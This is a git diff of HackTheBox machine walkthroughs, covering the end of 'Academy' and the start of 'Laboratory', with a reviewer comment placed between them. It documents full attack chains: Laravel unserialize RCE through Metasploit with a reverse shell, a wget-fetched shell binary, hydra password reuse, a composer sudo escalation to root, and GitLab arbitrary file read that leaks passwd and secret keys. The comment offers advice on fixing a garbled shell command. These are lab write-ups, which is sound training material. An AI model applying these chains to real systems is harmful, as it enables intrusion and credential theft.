+ Content-Type: application/x-www-form-urlencoded
+ Content-Length: 44
+ Origin: http://academy.htb
+ Connection: close
+ Referer: http://academy.htb/register.php
+ Cookie: PHPSESSID=mvopk0hecu88dl9kugslv1ihdp
+ Upgrade-Insecure-Requests: 1
+
+ uid=test&password;=test&confirm;=test**&roleid; =0**
+
+
+
+Something we didn't know earlier was the **roleid** post parameter set to 0, so we simply change it to **1** and then forward the intercepted request, and then we login to the **admin.php** page:
+
+
+
+And upon logging in, we get redirected to **admin-page.php** and we get the following:
+
+
+
+Here we're getting hinted towards a subdomain **dev-staging-01.academy.htb** , so let's add it to our hosts file:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/51 ] [~/HTB/Academy]
+ → sudo -i
+ [sudo] password for nothing:
+ ┌──(root💀nowhere)-[~]
+ └─# echo '10.10.10.215 dev-staging-01.academy.htb' >> /etc/hosts
+
+ ┌──(root💀nowhere)-[~]
+ └─# exit
+
+ [ 10.10.14.13/23 ] [ /dev/pts/51 ] [~/HTB/Academy]
+ → ping dev-staging-01.academy.htb
+ PING dev-staging-01.academy.htb (10.10.10.215) 56(84) bytes of data.
+ 64 bytes from academy.htb (10.10.10.215): icmp_seq=1 ttl=63 time=36.5 ms
+ 64 bytes from academy.htb (10.10.10.215): icmp_seq=2 ttl=63 time=39.9 ms
+ 64 bytes from academy.htb (10.10.10.215): icmp_seq=3 ttl=63 time=37.9 ms
+
+
+
+Now when we go there we get the following:
+
+
+
+Now if you read carefully, you see that this is a php laravel framework instance:
+
+
+
+So let's look for exploits to user on that service:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/51 ] [~/HTB/Academy]
+ → searchsploit laravel
+ -------------------------------------------------------- ---------------------------------
+ Exploit Title | Path
+ -------------------------------------------------------- ---------------------------------
+ Laravel - 'Hash::make()' Password Truncation Security | multiple/remote/39318.txt
+ Laravel 8.4.2 debug mode - Remote code execution | php/webapps/49424.py
+ Laravel Administrator 4 - Unrestricted File Upload (Aut | php/webapps/49112.py
+ Laravel Log Viewer <****0.13.0 - Local File Download | php/webapps/44343.py
+ Laravel Nova 3.7.0 - 'range' DoS | php/webapps/49198.txt**PHP Laravel Framework 5.5.40 / 5.6.x <__5.6.30 - token U | linux/remote/47129.rb**
+
+ UniSharp Laravel File Manager 2.0.0 - Arbitrary File Re | php/webapps/48166.txt
+ UniSharp Laravel File Manager 2.0.0-alpha7 - Arbitrary | php/webapps/46389.py
+ -------------------------------------------------------- ---------------------------------
+ Shellcodes: No Results
+
+
+we're going to use the ruby exploit that's for metasploit:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/51 ] [~/HTB/Academy]
+ → msfconsole
+
+
+ _---------.
+ .' ####### ;."
+ .---,. ;@ @@`; .---,..
+ ." @@@@@'.,'@@ @@@@@',.'@@@@ ".
+ '-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @;
+ `.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .'
+ "--'.@@@ -.@ @ ,'- .'--"
+ ".@' ; @ @ `. ;'
+ |@@@@ @@@ @ .
+ ' @@@ @@ @@ ,
+ `.@@@@ @@ .
+ ',@@ @ ; _____________
+ ( 3 C ) /|___ / Metasploit! \
+ ;@'. __*__,." \|--- \_____________/
+ '(.,..../
+
+
+ =[ metasploit v6.0.46-dev ]
+ + -- --=[ 2135 exploits - 1139 auxiliary - 365 post ]
+ + -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ + -- --=[ 8 evasion ]
+
+ Metasploit tip: To save all commands executed since start up
+ to a file, use the makerc command
+
+ msf6 > search laravel
+
+ Matching Modules
+ ================
+
+ # Name Disclosure Date Rank Check Description
+ - ---- --------------- ---- ----- -----------
+ 0 exploit/unix/http/laravel_token_unserialize_exec 2018-08-07 excellent Yes PHP Laravel Framework token Unserialize Remote Command Execution
+
+
+ Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/http/laravel_token_unserialize_exec
+
+ msf6 > use 0
+ [*] Using configured payload cmd/unix/reverse_perl
+ msf6 exploit(unix/http/laravel_token_unserialize_exec) > show options
+
+ Module options (exploit/unix/http/laravel_token_unserialize_exec):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ APP_KEY no The base64 encoded APP_KEY string from the .env file
+ Proxies no A proxy chain of format type:host:port[,type:host:port][...]
+ RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<****path>'
+ RPORT 80 yes The target port (TCP)
+ SSL false no Negotiate SSL/TLS for outgoing connections
+ TARGETURI / yes Path to target webapp
+ VHOST no HTTP server virtual host
+
+
+ Payload options (cmd/unix/reverse_perl):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ LHOST yes The listen address (an interface may be specified)
+ LPORT 4444 yes The listen port
+
+
+ Exploit target:
+
+ Id Name
+ -- ----
+ 0 Automatic
+
+So first let's get the APP key, which we should get from the .env file, but we don't have access to the server yet, so we just grab it from the debug page:
+
+
+
+Then we fill the rest of the options we need:
+
+
+ msf6 exploit(unix/http/laravel_token_unserialize_exec) > set APP_KEY dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
+ APP_KEY => dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
+
+ msf6 exploit(unix/http/laravel_token_unserialize_exec) > set RPORT 80
+ RPORT => 80
+
+ msf6 exploit(unix/http/laravel_token_unserialize_exec) > set RHOSTS 10.10.10.215
+ RHOSTS => 10.10.10.215
+
+ msf6 exploit(unix/http/laravel_token_unserialize_exec) > set VHOST dev-staging-01.academy.htb
+ VHOST => dev-staging-01.academy.htb
+
+ msf6 exploit(unix/http/laravel_token_unserialize_exec) > set LHOST tun0
+ LHOST => 10.10.14.13
+
+ msf6 exploit(unix/http/laravel_token_unserialize_exec) > exploit
+
+
+And when we launch the exploit:
+
+
+
+ [*] Started reverse TCP handler on 10.10.14.13:4444
+ [*] Command shell session 1 opened (10.10.14.13:4444 -> 10.10.10.215:46024) at 2021-06-04 08:52:16 +0200
+
+ [*] Command shell session 2 opened (10.10.14.13:4444 -> 10.10.10.215:46026) at 2021-06-04 08:52:16 +0200
+ [*] Command shell session 3 opened (10.10.14.13:4444 -> 10.10.10.215:46028) at 2021-06-04 08:52:16 +0200
+ [*] Command shell session 4 opened (10.10.14.13:4444 -> 10.10.10.215:46030) at 2021-06-04 08:52:17 +0200
+ id
+ uid=33(www-data) gid=33(www-data) groups=33(www-data)
+
+
+We get remote code execution as www-data!
+
+
+
+ cat /etc/passwd | grep bash
+ root:x:0:0:root:/root:/bin/bash
+ egre55:x:1000:1000:egre55:/home/egre55:/bin/bash
+ ls -lash /home
+ total 32K
+ 4.0K drwxr-xr-x 8 root root 4.0K Aug 10 2020 .
+ 4.0K drwxr-xr-x 20 root root 4.0K Feb 10 13:12 ..
+ 4.0K drwxr-xr-x 2 21y4d 21y4d 4.0K Aug 10 2020 21y4d
+ 4.0K drwxr-xr-x 2 ch4p ch4p 4.0K Aug 10 2020 ch4p
+ 4.0K drwxr-xr-x 4 cry0l1t3 cry0l1t3 4.0K Aug 12 2020 cry0l1t3
+ 4.0K drwxr-xr-x 3 egre55 egre55 4.0K Aug 10 2020 egre55
+ 4.0K drwxr-xr-x 2 g0blin g0blin 4.0K Aug 10 2020 g0blin
+ 4.0K drwxr-xr-x 5 mrb3n mrb3n 4.0K Aug 12 2020 mrb3n
+
+
+
+Now here we get alot of different users on this box. However for now let's just get a proper reverse shell:
+
+
+ which python python3 curl wget nc
+ /usr/bin/python3
+ /usr/bin/curl
+ /usr/bin/wget
+ /usr/bin/nc
+
+
+
+Let's upload xc via wget, and then execute it to get a reverse shell:
+
+
+ [term1]
+
+ [ 10.10.14.13/23 ] [ /dev/pts/90 ] [~/HTB/Academy]
+ → cp /home/nothing/HTB/Servmon/xc/xc .
+
+ [ 10.10.14.13/23 ] [ /dev/pts/90 ] [~/HTB/Academy]
+ → python3 -m http.server 9090
+
+
+ [term2]
+
+ wget http://10.10.14.13:9090/xc -O /tmp/xc
+
+ ls -lash /tmp/xc
+ 0 -rw-r--r-- 1 www-data www-data 0 Jun 4 07:23 /tmp/xc
+
+ chmod +x /tmp/xc
+
+ /tmp/xc 10.10.14.13 9002
+
+
+ [term3]
+
+ [ 10.10.14.13/23 ] [ /dev/pts/90 ] [~/HTB/Academy]
+ → ./xc -l -p 9002
+
+ __ _____
+ \ \/ / __|
+ > <****(__
+ /_/\_\___| by @xct_de
+ build: QUnVVFdLYEkibcKx
+
+ 2021/06/04 09:17:49 Listening on :9002
+ 2021/06/04 09:17:49 Waiting for connections...
+ 2021/06/04 09:17:59 Connection from 10.10.10.215:59984
+ 2021/06/04 09:17:59 Stream established
+
+ [*] Auto-Plugins:
+ [xc: /var/www/html/htb-academy-dev-01/public]: !shell
+ bash: cannot set terminal process group (1039): Inappropriate ioctl for device
+ bash: no job control in this shell
+ www-data@academy:/var/www/html/htb-academy-dev-01/public$ id
+ id
+ uid=33(www-data) gid=33(www-data) groups=33(www-data)
+
+Now let's upgrade it to a fully interactive shell:
+
+
+ www-data@academy:/var/www/html/htb-academy-dev-01/public$ python3 -c 'import pty; pty.spawn("/bin/bash")'
+ www-data@academy:/var/www/html/htb-academy-dev-01/public$ ^Z
+ [1] + 3847836 suspended ./xc -l -p 9002
+
+ [ 10.10.14.13/23 ] [ /dev/pts/90 ] [~/HTB/Academy]
+ → stty raw -echo ; fg
+ [1] + 3847836 continued ./xc -l -p 9002
+ $ export TERM=screen-256color
+ $ export SHELL=bash
+ $stty rows 40 columns 125
+ www-data@academy:/var/www/html/htb-academy-dev-01/public$ reset
+
+
+Now that we have our fully interactive reverse TTY shell, let's enumerate the box further:
+
+
+ www-data@academy:/var/www/html/htb-academy-dev-01/public$ cd ..
+ www-data@academy:/var/www/html/htb-academy-dev-01$ cd ..
+ www-data@academy:/var/www/html$ ls
+ academy htb-academy-dev-01 index.php
+ www-data@academy:/var/www/html$ cd academy
+ www-data@academy:/var/www/html/academy$ ls
+ app bootstrap composer.lock database phpunit.xml readme.md routes storage vendor
+ artisan composer.json config package.json public resources server.php tests webpack.mix.js
+ www-data@academy:/var/www/html/academy$ ls -a
+ . .env.example app composer.json database public routes tests
+ .. .gitattributes artisan composer.lock package.json readme.md server.php vendor
+ .env .gitignore bootstrap config phpunit.xml resources storage webpack.mix.js
+ www-data@academy:/var/www/html/academy$ cat .env
+ APP_NAME=Laravel
+ APP_ENV=local
+ APP_KEY=base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
+ APP_DEBUG=false
+ APP_URL=http://localhost
+
+ LOG_CHANNEL=stack
+
+ DB_CONNECTION=mysql
+ DB_HOST=127.0.0.1
+ DB_PORT=3306
+ DB_DATABASE=academy
+ DB_USERNAME=dev
+ DB_PASSWORD=mySup3rP4s5w0rd!!
+
+ BROADCAST_DRIVER=log
+ CACHE_DRIVER=file
+ SESSION_DRIVER=file
+ SESSION_LIFETIME=120
+ QUEUE_DRIVER=sync
+
+ REDIS_HOST=127.0.0.1
+ REDIS_PASSWORD=null
+ REDIS_PORT=6379
+
+ MAIL_DRIVER=smtp
+ MAIL_HOST=smtp.mailtrap.io
+ MAIL_PORT=2525
+ MAIL_USERNAME=null
+ MAIL_PASSWORD=null
+ MAIL_ENCRYPTION=null
+
+ PUSHER_APP_ID=
+ PUSHER_APP_KEY=
+ PUSHER_APP_SECRET=
+ PUSHER_APP_CLUSTER=mt1
+
+ MIX_PUSHER_APP_KEY="${PUSHER_APP_KEY}"
+ MIX_PUSHER_APP_CLUSTER="${PUSHER_APP_CLUSTER}"
+
+
+Going back up the filetree we get a password for an user:
+
+
+ www-data@academy:/var/www/html/academy$ ls -lash .env
+ 4.0K -rw-r--r-- 1 www-data www-data 706 Aug 13 2020 .env
+
+
+
+Although obviously this isn't www-data's password, this is probably one of the other users' passwords so let's try each one using hydra :
+
+
+ [term1]
+
+ www-data@academy:/var/www/html/academy$ ls -lash .env
+ 4.0K -rw-r--r-- 1 www-data www-data 706 Aug 13 2020 .env
+ www-data@academy:/var/www/html/academy$ ls -lash /home
+ total 32K
+ 4.0K drwxr-xr-x 8 root root 4.0K Aug 10 2020 .
+ 4.0K drwxr-xr-x 20 root root 4.0K Feb 10 13:12 ..
+ 4.0K drwxr-xr-x 2 21y4d 21y4d 4.0K Aug 10 2020 21y4d
+ 4.0K drwxr-xr-x 2 ch4p ch4p 4.0K Aug 10 2020 ch4p
+ 4.0K drwxr-xr-x 4 cry0l1t3 cry0l1t3 4.0K Aug 12 2020 cry0l1t3
+ 4.0K drwxr-xr-x 3 egre55 egre55 4.0K Aug 10 2020 egre55
+ 4.0K drwxr-xr-x 2 g0blin g0blin 4.0K Aug 10 2020 g0blin
+ 4.0K drwxr-xr-x 5 mrb3n mrb3n 4.0K Aug 12 2020 mrb3n
+
+
+ [term2]
+
+ [ 10.10.14.13/23 ] [ /dev/pts/51 ] [~/HTB/Academy]
+ → cat users.txt
+ 21y4d
+ ch4p
+ cry0l1t3
+ egre55
+ g0blin
+ mrb3n
+
+ [ 10.10.14.13/23 ] [ /dev/pts/51 ] [~/HTB/Academy]
+ → cat password.txt
+ mySup3rP4s5w0rd!!
+
+ [ 10.10.14.13/23 ] [ /dev/pts/51 ] [~/HTB/Academy]
+ → hydra -L users.txt -P password.txt ssh://10.10.10.215
+ Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
+
+ Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-06-04 09:30:00
+ [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
+ [DATA] max 6 tasks per 1 server, overall 6 tasks, 6 login tries (l:6/p:1), ~1 try per task
+ [DATA] attacking ssh://10.10.10.215:22/
+ [22][ssh] host: 10.10.10.215 login: cry0l1t3 password: mySup3rP4s5w0rd!!
+ 1 of 1 target successfully completed, 1 valid password found
+ Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-06-04 09:30:04
+
+
+
+And we found that it was the cry0l1t3 user's password! So let's login via SSH as this user:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/51 ] [~/HTB/Academy]
+ → ssh cry0l1t3@10.10.10.215
+ The authenticity of host '10.10.10.215 (10.10.10.215)' can't be established.
+ ECDSA key fingerprint is SHA256:4v7BvR4VfuEwrmXljKvXmF+JjLCgP/46G78oNEHzt2c.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '10.10.10.215' (ECDSA) to the list of known hosts.
+ cry0l1t3@10.10.10.215's password:
+ Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-52-generic x86_64)
+
+ * Documentation: https://help.ubuntu.com
+ * Management: https://landscape.canonical.com
+ * Support: https://ubuntu.com/advantage
+
+ System information as of Fri 04 Jun 2021 07:38:32 AM UTC
+
+ System load: 0.0
+ Usage of /: 38.3% of 13.72GB
+ Memory usage: 17%
+ Swap usage: 0%
+ Processes: 229
+ Users logged in: 0
+ IPv4 address for ens160: 10.10.10.215
+ IPv6 address for ens160: dead:beef::250:56ff:feb9:3bbc
+
+
+ 89 updates can be installed immediately.
+ 42 of these updates are security updates.
+ To see these additional updates run: apt list --upgradable
+
+
+ The list of available updates is more than a week old.
+ To check for new updates run: sudo apt update
+ Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
+
+
+ Last login: Wed Aug 12 21:58:45 2020 from 10.10.14.2
+ $ id
+ uid=1002(cry0l1t3) gid=1002(cry0l1t3) groups=1002(cry0l1t3),4(adm)
+ $ ls
+ user.txt
+ $ cat user.txt
+ faXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to get the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now in order to privesc to the root user, let's run linpeas.sh on the box to see what are the possible privilege escalation paths:
+
+
+
+ [term1]
+
+ [ 10.10.14.13/23 ] [ /dev/pts/89 ] [~/HTB/Academy]
+ → cp /home/nothing/Tools/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh .
+
+ [ 10.10.14.13/23 ] [ /dev/pts/89 ] [~/HTB/Academy]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+
+ [term2]
+
+ $ bash
+ cry0l1t3@academy:~$ wget http://10.10.14.13:9090/linpeas.sh -O /tmp/peas.sh
+ --2021-06-04 07:40:46-- http://10.10.14.13:9090/linpeas.sh
+ Connecting to 10.10.14.13:9090... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 341863 (334K) [text/x-sh]
+ Saving to: ‘/tmp/peas.sh’
+
+ /tmp/peas.sh 100%[====================================================>] 333.85K 689KB/s in 0.5s
+
+ 2021-06-04 07:40:47 (689 KB/s) - ‘/tmp/peas.sh’ saved [341863/341863]
+
+ cry0l1t3@academy:~$ chmod +x /tmp/peas.sh
+
+ cry0l1t3@academy:~$ /tmp/peas.sh
+
+
+
+` 
+
+let linpeas.sh run and then as you scroll through the output you will stumble upon the **mrb3n** user's password from the TTY audit logs:
+
+
+
+This is possible because we our user is in the adm group:
+
+
+ cry0l1t3@academy:~$ id
+ uid=1002(cry0l1t3) gid=1002(cry0l1t3) groups=1002(cry0l1t3),**4(adm)**
+
+
+
+So let's privesc to the **mrb3n** user using his password **mrb3n_Ac@d3my!**
+
+
+ cry0l1t3@academy:~$ su mrb3n
+ Password:
+ $ bash
+
+ mrb3n@academy:/home/cry0l1t3$ id
+ uid=1001(mrb3n) gid=1001(mrb3n) groups=1001(mrb3n)
+
+ mrb3n@academy:/home/cry0l1t3$ /tmp/peas.sh
+
+
+We run linpeas once again as the mrb3n user, and we don't see much, but when we do **sudo -l** we are hinted towards using composer:
+
+
+ mrb3n@academy:/home/cry0l1t3$ sudo -l
+ [sudo] password for mrb3n:
+ Matching Defaults entries for mrb3n on academy:
+ env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
+
+ User mrb3n may run the following commands on academy:
+ (ALL) /usr/bin/composer
+
+
+Taking a look at [gtfobins](https://gtfobins.github.io/gtfobins/composer/) we get a privilege escalation path to the root user:
+
+
+ mrb3n@academy:/home/cry0l1t3$ cd ..
+ mrb3n@academy:/home$ TF=$(mktemp -d)
+ mrb3n@academy:/home$ echo '{"scripts":{"x":"/bin/sh -i 0<****& 3 1>&3 2>&3"}}' >$TF/composer.json
+ mrb3n@academy:/home$ sudo composer --working-dir=$TF run-script x
+ PHP Warning: PHP Startup: Unable to load dynamic library 'mysqli.so' (tried: /usr/lib/php/20190902/mysqli.so (/usr/lib/php/20190902/mysqli.so: undefined symbol: mysqlnd_global_stats), /usr/lib/php/20190902/mysqli.so.so (/usr/lib/php/20190902/mysqli.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
+ PHP Warning: PHP Startup: Unable to load dynamic library 'pdo_mysql.so' (tried: /usr/lib/php/20190902/pdo_mysql.so (/usr/lib/php/20190902/pdo_mysql.so: undefined symbol: mysqlnd_allocator), /usr/lib/php/20190902/pdo_mysql.so.so (/usr/lib/php/20190902/pdo_mysql.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
+ Do not run Composer as root/super user! See https://getcomposer.org/root for details
+ > /bin/sh -i 0<****& 3 1>&3 2>&3
+ # id
+ uid=0(root) gid=0(root) groups=0(root)
+ # cat /root/root.txt
+ ffXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it! We managed to get to the root user and print the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
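Review bot: the composer privesc command near the end of this hunk is corrupted: `echo '{"scripts":{"x":"/bin/sh -i 0<****& 3 1>&3 2>&3"}}' >$TF/composer.json` (and the echoed `> /bin/sh -i 0<****& 3 1>&3 2>&3` line below it) show `****` where the markdown renderer ate the `<&3` redirection, so a reader copying the command as printed will not get a working shell; put those lines in a fenced code block so the redirections render verbatim, and do the same for the `[term1]`/`[term2]` sections, which are currently separated only by a stray `` ` `` line left over from a broken fence. Two smaller points: "This is possible because we our user is in the adm group" has a duplicated word, and the sentence about recovering the mrb3n password "from the TTY audit logs" never names the log file linpeas read, so the reader cannot verify the finding; stating which log it was, and that adm membership is what makes it readable, is also the defender takeaway of this section (TTY input logging captured a password typed at a prompt, and a low-privileged group could read it). Finally, the "Conclusion" heading ends with "Here we can see the progress graph :" followed by nothing, so the image reference is missing here too.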
diff --git a/Easy/53.md b/Easy/53.md
new file mode 100644
index 0000000..f20214e
--- /dev/null
+++ b/Easy/53.md
@@ -0,0 +1,575 @@
+# Laboratory Writeup
+
+
+
+## Introduction :
+
+Laboratory is an Easy Linux machine released back in November 2020.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Laboratory]
+ → nmap -vvv -p- 10.10.10.216 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered
+ Discovered open port 22/tcp on 10.10.10.216
+ Discovered open port 443/tcp on 10.10.10.216
+ Discovered open port 80/tcp on 10.10.10.216
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Laboratory]
+ → nmap -Pn -sCV -p 22,80,443 10.10.10.216
+ Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-04 10:19 CEST
+ Nmap scan report for 10.10.10.216
+ Host is up (0.037s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 3072 25:ba:64:8f:79:9d:5d:95:97:2c:1b:b2:5e:9b:55:0d (RSA)
+ | 256 28:00:89:05:55:f9:a2:ea:3c:7d:70:ea:4d:ea:60:0f (ECDSA)
+ |_ 256 77:20:ff:e9:46:c0:68:92:1a:0b:21:29:d1:53:aa:87 (ED25519)
+ 80/tcp open http Apache httpd 2.4.41
+ |_http-server-header: Apache/2.4.41 (Ubuntu)
+ |_http-title: Did not follow redirect to https://laboratory.htb/
+ 443/tcp open ssl/http Apache httpd 2.4.41 ((Ubuntu))
+ |_http-server-header: Apache/2.4.41 (Ubuntu)
+ |_http-title: The Laboratory
+ | ssl-cert: Subject: commonName=laboratory.htb
+ | Subject Alternative Name: DNS:git.laboratory.htb
+ | Not valid before: 2020-07-05T10:39:28
+ |_Not valid after: 2024-03-03T10:39:28
+ | tls-alpn:
+ |_ http/1.1
+ Service Info: Host: laboratory.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 17.61 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80/443 and the domain names **laboratory.htb** and **git.laboratory.htb** so let's add it to our hosts file:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Laboratory]
+ → sudo -i
+ [sudo] password for nothing:
+ ┌──(root💀nowhere)-[~]
+ └─# echo '10.10.10.216 laboratory.htb git.laboratory.htb' >> /etc/hosts
+
+ ┌──(root💀nowhere)-[~]
+ └─# exit
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Laboratory]
+ → ping -c1 laboratory.htb
+ PING laboratory.htb (10.10.10.216) 56(84) bytes of data.
+ 64 bytes from laboratory.htb (10.10.10.216): icmp_seq=1 ttl=63 time=81.7 ms
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Laboratory]
+ → ping -c1 git.laboratory.htb
+ PING laboratory.htb (10.10.10.216) 56(84) bytes of data.
+ 64 bytes from laboratory.htb (10.10.10.216): icmp_seq=1 ttl=63 time=35.7 ms
+
+
+
+Now let's visit it:
+
+
+
+We also find a few potential users:
+
+
+
+Now let's check out the git subdomain:
+
+
+
+We can register a test user and log into it (make sure the email address ends with **laboratory.htb**):
+
+
+
+Once our account is created we get access to the gitlab instance, and by clicking the Help tab we see that we are on a Gitlab Community Edition version 12.8.1
+
+
+
+Here we see that there is only one repository which is owned by dexter:
+
+
+
+Now since we know the Gitlab edition, let's look for exploits to use:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Laboratory]
+ → searchsploit gitlab
+ ----------------------------------------------- ---------------------------------
+ Exploit Title | Path
+ ----------------------------------------------- ---------------------------------
+ GitLab - 'impersonate' Feature Privilege Escal | ruby/webapps/40236.txt
+ GitLab 11.4.7 - RCE (Authenticated) (2) | ruby/webapps/49334.py
+ GitLab 11.4.7 - Remote Code Execution (Authent | ruby/webapps/49257.py
+ GitLab 12.9.0 - Arbitrary File Read | ruby/webapps/48431.txt
+ Gitlab 12.9.0 - Arbitrary File Read (Authentic | ruby/webapps/49076.py
+ Gitlab 6.0 - Persistent Cross-Site Scripting | php/webapps/30329.sh
+ GitLab Community Edition (CE) 13.10.3 - 'Sign_ | ruby/webapps/49822.rb
+ GitLab Community Edition (CE) 13.10.3 - User E | ruby/webapps/49821.sh
+ Gitlab-shell - Code Execution (Metasploit) | linux/remote/34362.rb
+ Jenkins Gitlab Hook Plugin 1.4.2 - Reflected C | java/webapps/47927.txt
+ NPMJS gitlabhook 0.0.17 - 'repository' Remote | json/webapps/47420.txt
+ ----------------------------------------------- ---------------------------------
+ Shellcodes: No Results
+
+
+
+We could use the Authenticated Arbitrary File Read exploit, but there is an [report](https://hackerone.com/reports/827052) on hackerone that describes the intended path **CVE-2020-10977** , so let's follow it:
+
+
+
+First we create 2 projects, then we create an issue on projectA that contains the following payload inthe issue description:
+
+
+ 
+
+
+
+` 
+
+Once that's done, we move the issue to projectB:
+
+
+
+And once the issue is moved, you will see that the passwd file is linked:
+
+
+
+Here's what we get:
+
+
+ root:x:0:0:root:/root:/bin/bash
+ daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+ bin:x:2:2:bin:/bin:/usr/sbin/nologin
+ sys:x:3:3:sys:/dev:/usr/sbin/nologin
+ sync:x:4:65534:sync:/bin:/bin/sync
+ games:x:5:60:games:/usr/games:/usr/sbin/nologin
+ man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+ lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+ mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+ news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+ uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+ proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+ www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+ backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+ list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+ irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+ gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+ nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+ systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
+ systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
+ systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
+ systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
+ _apt:x:104:65534::/nonexistent:/bin/false
+ sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
+ git:x:998:998::/var/opt/gitlab:/bin/sh
+ gitlab-www:x:999:999::/var/opt/gitlab/nginx:/bin/false
+ gitlab-redis:x:997:997::/var/opt/gitlab/redis:/bin/false
+ gitlab-psql:x:996:996::/var/opt/gitlab/postgresql:/bin/sh
+ mattermost:x:994:994::/var/opt/gitlab/mattermost:/bin/sh
+ registry:x:993:993::/var/opt/gitlab/registry:/bin/sh
+ gitlab-prometheus:x:992:992::/var/opt/gitlab/prometheus:/bin/sh
+ gitlab-consul:x:991:991::/var/opt/gitlab/consul:/bin/sh
+
+
+
+So now we verified that there was a Local File Inclusion, the hackerone report tells us that this can be leveraged to a RCE which exploits a deserialization vulnerability inside the **experimentation_subject_id** cookie. To do so we need to grab the **secrets.yml** file first with the following payload:
+
+
+ 
+
+
+
+So we just edit the description of our issue and move it to the other project once we save the changes to grab the next file:
+
+  
+
+Here's the secrets.yml file:
+
+
+ # This file is managed by gitlab-ctl. Manual changes will be
+ # erased! To change the contents below, edit /etc/gitlab/gitlab.rb
+ # and run `sudo gitlab-ctl reconfigure`.
+
+ ---
+ production:
+ db_key_base: 627773a77f567a5853a5c6652018f3f6e41d04aa53ed1e0df33c66b04ef0c38b88f402e0e73ba7676e93f1e54e425f74d59528fb35b170a1b9d5ce620bc11838
+ secret_key_base: 3231f54b33e0c1ce998113c083528460153b19542a70173b4458a21e845ffa33cc45ca7486fc8ebb6b2727cc02feea4c3adbe2cc7b65003510e4031e164137b3
+ otp_key_base: db3432d6fa4c43e68bf7024f3c92fea4eeea1f6be1e6ebd6bb6e40e930f0933068810311dc9f0ec78196faa69e0aac01171d62f4e225d61e0b84263903fd06af
+ openid_connect_signing_key: |
+ -----BEGIN RSA PRIVATE KEY-----
+ MIIJKQIBAAKCAgEA5LQnENotwu/SUAshZ9vacrnVeYXrYPJoxkaRc2Q3JpbRcZTu
